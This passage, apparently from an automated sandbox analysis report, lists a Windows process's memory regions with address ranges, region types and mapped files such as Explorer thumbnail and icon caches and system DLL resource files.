name = "pagefile_0x0000000001de0000" filename = "" Region: id = 527 start_va = 0x21e0000 end_va = 0x21e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000021e0000" filename = "" Region: id = 528 start_va = 0x21f0000 end_va = 0x21f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000021f0000" filename = "" Region: id = 529 start_va = 0x2200000 end_va = 0x2201fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002200000" filename = "" Region: id = 530 start_va = 0x2220000 end_va = 0x2221fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 531 start_va = 0x2230000 end_va = 0x2231fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 532 start_va = 0x2250000 end_va = 0x2251fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 533 start_va = 0x2260000 end_va = 0x2260fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_256.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_256.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_256.db") Region: id = 534 start_va = 0x2270000 end_va = 0x2284fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 535 start_va = 0x2290000 end_va = 0x22a7fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000000e.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.1.ver0x000000000000000e.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000000e.db") Region: id = 536 start_va = 0x22e0000 end_va = 0x235ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022e0000" filename = "" Region: id = 537 start_va = 0x2360000 end_va = 0x236ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 538 start_va = 0x2370000 end_va = 0x26a6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 539 start_va = 0x26b0000 end_va = 0x26b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026b0000" filename = "" Region: id = 540 start_va = 0x26c0000 end_va = 0x2707fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026c0000" filename = "" Region: id = 541 start_va = 0x2710000 end_va = 0x2713fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 542 start_va = 0x2720000 end_va = 0x2721fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 543 start_va = 0x2730000 end_va = 0x280ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 544 start_va = 0x2810000 end_va = 0x290ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 545 start_va = 0x2910000 end_va = 0x298ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002910000" filename = "" Region: id = 546 start_va = 0x2990000 end_va = 0x2a4bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002990000" filename = "" Region: id = 547 start_va = 0x2a50000 end_va = 0x2a53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a50000" filename = "" Region: id = 548 start_va = 0x2a60000 end_va = 0x2b5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a60000" filename = "" Region: id = 549 start_va = 0x2b60000 end_va = 0x2b66fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b60000" filename = "" Region: id = 550 start_va = 0x2b70000 end_va = 0x2b71fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002b70000" filename = "" Region: id = 551 start_va = 0x2b80000 end_va = 0x3bbffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 552 start_va = 0x3bc0000 end_va = 0x3bc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003bc0000" filename = "" Region: id = 553 start_va = 0x3bd0000 end_va = 0x3bd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003bd0000" filename = "" Region: id = 554 start_va = 0x3be0000 end_va = 0x3be0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003be0000" filename = "" Region: id = 555 start_va = 0x3bf0000 end_va = 0x3bf1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003bf0000" filename = "" Region: id = 556 start_va = 0x3c00000 end_va = 0x3c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c00000" filename = "" Region: id = 557 start_va = 0x3c80000 end_va = 0x3c81fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c80000" filename = "" Region: id = 558 start_va = 0x3c90000 end_va = 0x3c90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c90000" filename = "" Region: id = 559 start_va = 0x3ca0000 end_va = 0x3ca0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ca0000" filename = "" Region: id = 560 start_va = 0x3cb0000 end_va = 0x3cb1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003cb0000" filename = "" Region: id = 561 start_va = 0x3cc0000 end_va = 0x3dbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cc0000" filename = "" Region: id = 562 start_va = 0x3dc0000 end_va = 0x3dc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003dc0000" filename = "" Region: id = 563 start_va = 0x3dd0000 end_va = 0x3ddffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003dd0000" filename = "" Region: id = 564 start_va = 0x3de0000 end_va = 0x3deffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003de0000" filename = "" Region: id = 565 start_va = 0x3df0000 end_va = 0x3dfffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003df0000" filename = "" Region: id = 566 start_va = 0x3e00000 end_va = 0x3e00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e00000" filename = "" Region: id = 567 start_va = 0x3e10000 end_va = 0x3e10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e10000" filename = "" Region: id = 568 start_va = 0x3e20000 end_va = 0x3e20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e20000" filename = "" Region: id = 569 start_va = 0x3e30000 end_va = 0x3e33fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 570 start_va = 0x3e40000 end_va = 0x3e40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e40000" filename = "" Region: id = 571 start_va = 0x3e50000 end_va = 0x3e50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003e50000" filename = "" Region: id = 572 start_va = 0x3e60000 end_va = 0x3e60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e60000" filename = "" Region: id = 573 start_va = 0x3e70000 end_va = 0x3e71fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003e70000" filename = "" Region: id = 574 start_va = 0x3e80000 end_va = 0x3eb8fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003e80000" filename = "" Region: id = 575 start_va = 0x3ec0000 end_va = 0x3ec0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ec0000" filename = "" Region: id = 576 start_va = 0x3ed0000 end_va = 0x3ed0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ed0000" filename = "" Region: id = 577 start_va = 0x3ee0000 end_va = 0x3ee1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ee0000" filename = "" Region: id = 578 start_va = 0x3ef0000 end_va = 0x3ef1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003ef0000" filename = "" Region: id = 579 start_va = 0x3f00000 end_va = 0x3f00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f00000" filename = "" Region: id = 580 start_va = 0x3f10000 end_va = 0x3f10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f10000" filename = "" Region: id = 581 start_va = 0x3f20000 end_va = 0x3f20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f20000" filename = "" Region: id = 582 start_va = 0x3f30000 end_va = 0x3f38fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f30000" filename = "" Region: id = 583 start_va = 0x3f40000 end_va = 0x3f41fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003f40000" filename = "" Region: id = 584 start_va = 0x3f50000 end_va = 0x3f51fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003f50000" filename = "" Region: id = 585 start_va = 0x3f60000 end_va = 0x3f63fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 586 start_va = 0x3f70000 end_va = 0x3fb4fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db") Region: id = 587 start_va = 0x3fc0000 end_va = 0x3fc3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 588 start_va = 0x3fd0000 end_va = 0x405dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 589 start_va = 0x4060000 end_va = 0x40dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004060000" filename = "" Region: id = 590 start_va = 0x40e0000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040e0000" filename = "" Region: id = 591 start_va = 0x4160000 end_va = 0x41dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004160000" filename = "" Region: id = 592 start_va = 0x41e0000 end_va = 0x41e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041e0000" filename = "" Region: id = 593 start_va = 0x41f0000 end_va = 0x41f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041f0000" filename = "" Region: id = 594 start_va = 0x4270000 end_va = 0x42effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004270000" filename = "" Region: id = 595 start_va = 0x42f0000 end_va = 0x42f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000042f0000" filename = "" Region: id = 596 start_va = 0x4300000 end_va = 0x4300fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "counters.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 597 start_va = 0x4310000 end_va = 0x431ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004310000" filename = "" Region: id = 598 start_va = 0x4320000 end_va = 0x4320fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004320000" filename = "" Region: id = 599 start_va = 0x4370000 end_va = 0x43effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004370000" filename = "" Region: id = 600 start_va = 0x43f0000 end_va = 0x48e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000043f0000" filename = "" Region: id = 601 start_va = 0x48f0000 end_va = 0x4aeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000048f0000" filename = "" Region: id = 602 start_va = 0x4af0000 end_va = 0x4af0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004af0000" filename = "" Region: id = 603 start_va = 0x4b00000 end_va = 0x4b03fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 604 start_va = 0x4b10000 end_va = 0x4b11fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b10000" filename = "" Region: id = 605 start_va = 0x4b20000 end_va = 0x4b21fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "inputswitch.dll.mui" filename = "\\Windows\\System32\\en-US\\InputSwitch.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\inputswitch.dll.mui") Region: id = 606 start_va = 0x4b30000 end_va = 0x4b30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b30000" filename = "" Region: id = 607 start_va = 0x4b40000 end_va = 0x4b41fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b40000" filename = "" Region: id = 608 start_va = 0x4b50000 end_va = 0x4b51fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b50000" filename = "" Region: id = 609 start_va = 0x4b60000 end_va = 0x4b60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b60000" filename = "" Region: id = 610 start_va = 0x4b70000 end_va = 0x4b70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b70000" filename = "" Region: id = 611 start_va = 0x4b80000 end_va = 0x4b80fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll") Region: id = 612 start_va = 0x4b90000 end_va = 0x4b96fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b90000" filename = "" Region: id = 613 start_va = 0x4ba0000 end_va = 0x4c9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004ba0000" filename = "" Region: id = 614 start_va = 0x4ca0000 end_va = 0x4caffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004ca0000" filename = "" Region: id = 615 start_va = 0x4cb0000 end_va = 0x4cb4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 616 start_va = 0x4cc0000 end_va = 0x4ccffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 617 start_va = 0x4cd0000 end_va = 0x4cd1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004cd0000" filename = "" Region: id = 618 start_va = 0x4cf0000 end_va = 0x4cf0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mmdevapi.dll.mui" filename = "\\Windows\\System32\\en-US\\MMDevAPI.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mmdevapi.dll.mui") Region: id = 619 start_va = 0x4d10000 end_va = 0x4d11fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004d10000" filename = "" Region: id = 620 start_va = 0x4d20000 end_va = 0x4d22fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d20000" filename = "" Region: id = 621 start_va = 0x4d30000 end_va = 0x4d36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "explorerframe.dll.mui" filename = "\\Windows\\System32\\en-US\\explorerframe.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\explorerframe.dll.mui") Region: id = 622 start_va = 0x4d60000 end_va = 0x4d62fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004d60000" filename = "" Region: id = 623 start_va = 0x4d70000 end_va = 0x4d71fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004d70000" filename = "" Region: id = 624 start_va = 0x4d80000 end_va = 0x4d80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004d80000" filename = "" Region: id = 625 start_va = 0x4d90000 end_va = 0x4d91fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004d90000" filename = "" Region: id = 626 start_va = 0x4db0000 end_va = 0x4db3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "bthprops.cpl.mui" filename = "\\Windows\\System32\\en-US\\bthprops.cpl.mui" (normalized: "c:\\windows\\system32\\en-us\\bthprops.cpl.mui") Region: id = 627 start_va = 0x4dd0000 end_va = 0x4dd1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004dd0000" filename = "" Region: id = 628 start_va = 0x4de0000 end_va = 0x4de1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004de0000" filename = "" Region: id = 629 start_va = 0x4df0000 end_va = 0x4e5bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004df0000" filename = "" Region: id = 630 start_va = 0x4e60000 end_va = 0x4f1efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004e60000" filename = "" Region: id = 631 start_va = 0x4f40000 end_va = 0x503ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004f40000" filename = "" Region: id = 632 start_va = 0x5040000 end_va = 0x5040fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Region: id = 633 start_va = 0x5050000 end_va = 0x5051fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005050000" filename = "" Region: id = 634 start_va = 0x5080000 end_va = 0x5081fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005080000" filename = "" Region: id = 635 start_va = 0x50a0000 end_va = 0x50a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000050a0000" filename = "" Region: id = 636 start_va = 0x50b0000 end_va = 0x50b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000050b0000" filename = "" Region: id = 637 start_va = 0x50c0000 end_va = 0x513ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000050c0000" filename = "" Region: id = 638 start_va = 0x5150000 end_va = 0x5197fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005150000" filename = "" Region: id = 639 start_va = 0x51a0000 end_va = 0x5358fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "office.odf" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 640 start_va = 0x53e0000 end_va = 0x545ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000053e0000" filename = "" Region: id = 641 start_va = 0x5460000 end_va = 0x5c5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005460000" filename = "" Region: id = 642 start_va = 0x5c90000 end_va = 0x5c91fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 643 start_va = 0x5ca0000 end_va = 0x5ca0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 644 start_va = 0x5ce0000 end_va = 0x5ce1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 645 start_va = 0x5d00000 end_va = 0x5d01fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 646 start_va = 0x5d60000 end_va = 0x5ddffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005d60000" filename = "" Region: id = 647 start_va = 0x5de0000 end_va = 0x5e5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005de0000" filename = "" Region: id = 648 start_va = 0x5e60000 end_va = 0x5ea8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005e60000" filename = "" Region: id = 649 start_va = 0x5eb0000 end_va = 0x8231fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "appdb.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Notifications\\appdb.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\notifications\\appdb.dat") Region: id = 650 start_va = 0x8240000 end_va = 0x8241fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008240000" filename = "" Region: id = 651 start_va = 0x8250000 end_va = 0x8251fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008250000" filename = "" Region: id = 652 start_va = 0x8340000 end_va = 0x845cfff monitored = 0 entry_point = 0x8341cc0 region_type = mapped_file name = "wscui.cpl" filename = "\\Windows\\System32\\wscui.cpl" (normalized: "c:\\windows\\system32\\wscui.cpl") Region: id = 653 start_va = 0x84c0000 end_va = 0x85bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000084c0000" filename = "" Region: id = 654 start_va = 0x85c0000 end_va = 0x87bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000085c0000" filename = "" Region: id = 655 start_va = 0x87f0000 end_va = 0x87f6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ole32.dll.mui" filename = "\\Windows\\System32\\en-US\\ole32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\ole32.dll.mui") Region: id = 656 start_va = 0x8850000 end_va = 0x8861fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008850000" filename = "" Region: id = 657 start_va = 0x8870000 end_va = 0x8880fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1255.nls" filename = "\\Windows\\System32\\C_1255.NLS" (normalized: "c:\\windows\\system32\\c_1255.nls") Region: id = 658 start_va = 0x8890000 end_va = 0x8892fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008890000" filename = "" Region: id = 659 start_va = 0x88b0000 end_va = 0x88b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000088b0000" filename = "" Region: id = 660 start_va = 0x88c0000 end_va = 0x89bffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 661 start_va = 0x8a20000 end_va = 0x8a2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008a20000" filename = "" Region: id = 662 start_va = 0x8a30000 end_va = 0x8bb7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ieframe.dll.mui" filename = "\\Windows\\System32\\en-US\\ieframe.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\ieframe.dll.mui") Region: id = 663 start_va = 0x8bc0000 end_va = 0x8c3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008bc0000" filename = "" Region: id = 664 start_va = 0x8cc0000 end_va = 0x8d3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008cc0000" filename = "" Region: id = 665 start_va = 0x8dc0000 end_va = 0x8e3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008dc0000" filename = "" Region: id = 666 start_va = 0x8e40000 end_va = 0x8f3ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_32.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_32.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_32.db") Region: id = 667 start_va = 0x8f40000 end_va = 0x903ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "iconcache_16.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_16.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_16.db") Region: id = 668 start_va = 0x9040000 end_va = 0x913ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 669 start_va = 0x9140000 end_va = 0x923ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 670 start_va = 0x9240000 end_va = 0x92bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009240000" filename = "" Region: id = 671 start_va = 0x92c0000 end_va = 0x933ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000092c0000" filename = "" Region: id = 672 start_va = 0x9340000 end_va = 0x943ffff 